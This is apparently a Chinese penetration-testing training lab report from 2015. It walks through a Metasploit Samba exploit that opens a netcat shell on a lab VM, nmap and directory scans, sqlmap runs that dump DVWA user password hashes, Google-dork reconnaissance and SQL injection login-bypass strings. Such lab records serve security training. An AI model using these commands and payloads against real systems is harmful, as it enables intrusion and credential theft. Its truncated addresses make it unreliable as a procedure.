渗透测试 实验报告 (中国移动安全部).doc

渗透测试培训 3月13日第一天：主要实验总结首先利用struts2漏洞，可以直接执行任意命令，取得主机控制权。实验环境：KALI linux 作为攻击工具；owasp 作为靶机2003 metaspoitable 实现能够成功访问使用metaspliot完成对于靶机samba 服务的攻击，获取shell 权限search samba 查找模块Use multi/samba/usemap_script 选择渗透攻击模块Show payloads 查看与该渗透模块相兼容的攻击载荷Set payload cmd/unix/bind_netcat选择netcat工具在渗透攻击成功后执行shellShow options 查看需要设置的参数Set RHOST 54 设置主机攻击主机Exploit启动攻击1、首先安装vm虚拟机程序，开启kali，owasp和metaspoitalbe等工具和搭建环境，使得网络可达，网络配置上选择nat模式，地址范围为/242、开启kali虚机，进入root模式，首先进入msfconsle，修改初始密码为123456msf passwd * exec: passwd 输入新的 UNIX 密码：重新输入新的 UNIX 密码：passwd：已成功更新密码然后寻找samba模块msf search sambaMatching Modules= Name Disclosure Date Rank Description - - - - auxiliary/admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal auxiliary/dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow auxiliary/dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap Overflow auxiliary/dos/samba/read_nttrans_ea_list normal Samba read_nttrans_ea_list Integer Overflow exploit/freebsd/samba/trans2open 2003-04-07 great Samba trans2open Overflow (*BSD x86) exploit/linux/samba/chain_reply 2010-06-16 good Samba chain_reply Memory Corruption (Linux x86) exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Samba lsa_io_trans_names Heap Overflow exploit/linux/samba/setinfopolicy_heap 2012-04-10 normal Samba SetInformationPolicy AuditEventsInfo Heap Overflow exploit/linux/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Linux x86) exploit/multi/samba/nttrans 2003-04-07 average Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow exploit/multi/samba/usermap_script 2007-05-14 excellent Samba username map script Command Execution exploit/osx/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/osx/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Mac OS X PPC) exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average Samba lsa_io_trans_names Heap Overflow exploit/solaris/samba/trans2open 2003-04-07 great Samba trans2open Overflow (Solaris SPARC) exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Execution exploit/windows/http/sambar6_search_results 2003-06-21 normal Sambar 6 Search Results Buffer Overflow exploit/windows/license/calicclnt_getconfig 2005-03-02 average Computer Associates License Client GETCONFIG Overflow post/linux/gather/enum_configs normal Linux Gather Configurationsmsf use multi/samba/usermap_script 选择渗透攻击模块msf exploit(usermap_script) show payloads 查看与该渗透模块相兼容的攻击载荷Compatible Payloads= Name Disclosure Date Rank Description - - - - cmd/unix/bind_awk normal Unix Command Shell, Bind TCP (via AWK) cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_lua normal Unix Command Shell, Bind TCP (via Lua) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat) cmd/unix/bind_netcat_gaping normal Unix Command Shell, Bind TCP (via netcat -e) cmd/unix/bind_netcat_gaping_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/bind_zsh normal Unix Command Shell, Bind TCP (via Zsh) cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/reverse normal Unix Command Shell, Double Reverse TCP (telnet) cmd/unix/reverse_awk normal Unix Command Shell, Reverse TCP (via AWK) cmd/unix/reverse_lua normal Unix Command Shell, Reverse TCP (via Lua) cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat) cmd/unix/reverse_netcat_gaping normal Unix Command Shell, Reverse TCP (via netcat -e) cmd/unix/reverse_openssl normal Unix Command Shell, Double Reverse TCP SSL (openssl) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_perl_ssl normal Unix Command Shell, Reverse TCP SSL (via perl) cmd/unix/reverse_php_ssl normal Unix Command Shell, Reverse TCP SSL (via php) cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python) cmd/unix/reverse_python_ssl normal Unix Command Shell, Reverse TCP SSL (via python) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) cmd/unix/reverse_ruby_ssl normal Unix Command Shell, Reverse TCP SSL (via Ruby) cmd/unix/reverse_ssl_double_telnet normal Unix Command Shell, Double Reverse TCP SSL (telnet) cmd/unix/reverse_zsh normal Unix Command Shell, Reverse TCP (via Zsh)msf exploit(usermap_script) set payload cmd/unix/bind_netcat 选择netcat工具在渗透攻击成功后执行shellpayload = cmd/unix/bind_netcatmsf exploit(usermap_script) show options 查看需要设置的参数msf exploit(usermap_script) set RHOST 54设置主机攻击主机RHOST = 54msf exploit(usermap_script) exploit启动攻击* Started bind handler* Command shell session 1 opened (28:56558 - 54:4444) at 2015-03-13 16:06:40 +0800已经取得54机子的控制权，可以增加用户useradd test 用户增加成功&存活探测 -PU -sn UDP ping不列服务，-Pn不适用pingnmap -sS -Pn xx.xx.xx.xx tcp syn 扫描 不发送icmpnamp -sV -Pn xx.xx.xx.xx 列出服务详细信息namp -PO -script=smb-check-vulns xx.xx.xx.xx 查找ms-08067漏洞&nmap 网站扫描msf nmapmsf nmap -sV -Pn 54* exec: nmap -sV -Pn 54Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CSTNmap scan report for 54Host is up (0.00020s latency).All 1000 scanned ports on 54 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)Service detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 22.84 secondsmsf nmap -PO -script=smb-check-vulns 54* exec: nmap -PO -script=smb-check-vulns 54Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CSTNmap scan report for 54Host is up (0.00021s latency).All 1000 scanned ports on 54 are filteredMAC Address: 00:50:56:E7:1B:31 (VMware)map done: 1 IP address (1 host up) scanned in 23.06 seconds%msf nmap -O * exec: nmap -O Starting Nmap 6.46 ( ) at 2015-03-13 17:16 CSTNmap scan report for (32)Host is up (0.0054s latency).Not shown: 999 filtered portsPORT STATE SERVICE80/tcp open httpWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)No exact OS matches for host (test conditions non-ideal).OS detection performed. Please report any incorrect results at /submit/ .Nmap done: 1 IP address (1 host up) scanned in 57.88 secondsmsf use auxiliary/scanner/http/dir_scannermsf auxiliary(dir_scanner) set THREADS 50THREADS = 50msf auxiliary(dir_scanner) set RHOSTS RHOSTS = msf auxiliary(dir_scanner) run* Detecting error code* Detecting error code* Scanned 2 of 2 hosts (100% complete)* Auxiliary module execution completedsqlmap 检查sql注入的漏洞rootkali:# sqlmaprootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23带cookie的方式查出这个网站数据库的用户和密码sqlmap/1.0-dev - automatic SQL injection and database takeover tool ! legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end users responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program* starting at 11:50:2011:50:20 INFO testing connection to the target URL11:50:20 INFO testing if the target URL is stable. This can take a couple of seconds11:50:21 INFO target URL is stable11:50:21 INFO testing if GET parameter id is dynamic11:50:21 INFO confirming that GET parameter id is dynamic11:50:21 INFO GET parameter id is dynamic11:50:21 INFO heuristics detected web page charset ascii11:50:21 INFO heuristic (basic) test shows that GET parameter id might be injectable (possible DBMS: MySQL)11:50:21 INFO testing for SQL injection on GET parameter idheuristic (parsing) test showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? Y/n ydo you want to include all tests for MySQL extending provided level (1) and risk (1)? Y/n y11:50:25 INFO testing AND boolean-based blind - WHERE or HAVING clause11:50:25 WARNING reflective value(s) found and filtering out11:50:25 INFO GET parameter id seems to be AND boolean-based blind - WHERE or HAVING clause injectable 11:50:25 INFO testing MySQL = 5.0 AND error-based - WHERE or HAVING clause11:50:25 INFO GET parameter id is MySQL = 5.0 AND error-based - WHERE or HAVING clause injectable 11:50:25 INFO testing MySQL inline queries11:50:25 INFO testing MySQL 5.0.11 stacked queries11:50:25 WARNING time-based comparison requires larger statistical model, please wait.11:50:25 INFO testing MySQL 5.0.11 AND time-based blind11:50:36 INFO GET parameter id seems to be MySQL 5.0.11 AND time-based blind injectable 11:50:36 INFO testing MySQL UNION query (NULL) - 1 to 20 columns11:50:36 INFO automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found11:50:36 INFO ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test11:50:36 INFO target URL appears to have 2 columns in query11:50:36 INFO GET parameter id is MySQL UNION query (NULL) - 1 to 20 columns injectableGET parameter id is vulnerable. Do you want to keep testing the others (if any)? y/N nsqlmap identified the following injection points with a total of 41 HTTP(s) requests:-Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1 AND 4334=4334 AND iasX=iasX&Submit=Submit Type: error-based Title: MySQL = 5.0 AND error-based - WHERE or HAVING clause Payload: id=1 AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END),0x7163716271,FLOOR(RAND(0)*2)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND zAHU=zAHU&Submit=Submit Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b497150534967787451,0x7163716271)#&Submit=Submit Type: AND/OR time-based blind Title: MySQL 5.0.11 AND time-based blind Payload: id=1 AND SLEEP(5) AND xfNp=xfNp&Submit=Submit-11:50:40 INFO the back-end DBMS is MySQLweb server operating system: Linux Ubuntu 10.04 (Lucid Lynx)web application technology: PHP 5.3.2, Apache 2.2.14back-end DBMS: MySQL 5.011:50:40 INFO fetched data logged to text files under /usr/share/sqlmap/output/29* shutting down at 11:50:40rootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23 -p id -dbs可以看出返回数据库为：11:53:32 WARNING reflective value(s) found and filtering outavailable databases 2:* dvwa* information_schemarootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23 -p id -D dvwa -tables 查看dvwa数据库Database: dvwa2 tables+-+| guestbook | users |+-+rootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23 -p id -D dvwa -T users -columnsDatabase: dvwaTable: users6 columns+-+-+| Column | Type |+-+-+| user | varchar(15) | avatar | varchar(70) | first_name | varchar(15) | last_name | varchar(15) | password | varchar(32) | user_id | int(6) |+-+-+rootkali:# sqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# -cookie=security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23 -p id -D dvwa -T users -C user,password -dumpDatabase: dvwaTable: users5 entries+-+-+| user | password |+-+-+| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | admin | 21232f297a57a5a743894a0e4a801fc3 (admin) | gordonb | e99a18c428cb38d5f260853678922e03 (abc123) | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 |+-+-+可以看出用户名为admin 密码是admin成功2day&情报收集whois 域名注册信息查询。目标：netcraft网站提供的信息查询，查询网站宿主，站点排名，操作系统 T/site_report?url=查询网站旁注技术，主站没问题，可以看一下同服务器上其他的网站IP2domain反查询网站 /reverse_ip1、Google /google-dorks2、目录结构parent directory site：/XXXX(inc:网站培植信息，数据库口令等；bak:备份文件；txt or sql数据结构等use auxiliary/scanner/http/dir_scannerset THREADS 50 设置进程set RHOSTS XXXX 设置目标设置完成后进行runexploitrobots.txt告诉搜索引擎那些目录是敏感文件&3、检索特定类型文件 site:XXXX.filetype.xls4、搜索易存在SQL注入点的页面 site:XXX inurl:login登陆界面里面在随机用户后面加个引号，引发数据库错误，然后可以发现数据库查询的格式select from users username=xx and password=xxadmin OR1admin or1 select fromusers username=adminadmin or 1=1-密码就随便输入数字即可网站上页面上加一个引号 如果存在注入就会出现数据库报错，否则就是页面没有变化还有一种方式就是再后面加 and 1=1或者 1=2，都会报错，还有a=aadmin or 1=1-进去sqlmapsqlmap -u 29/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# sqlmap -u http:/rootkali:# sqlmapsqlmap -u url -cookie=-p id -D -t 主机探测与端口扫描活跃主机扫描USE ausiliary/scanner/discovery/arp_sweepset RHOSTS 2-130set THREADS 50run2、nmap服务扫描与查点1、metasploit的scanner辅助模块中，有很多用于服务扫描和查点的工具，这些工具常以service namelogin 命名search name:version2、ssh查点use auxiliary/scanner/ssh/ssh_versionset RHOSTS xxxxset THREADS 100run&ssh查点实验：rootkali:# msfconsolemsf use auxiliary/scanner/ssh/ssh_versionmsf auxiliary(ssh_version) show optionsModule options (auxi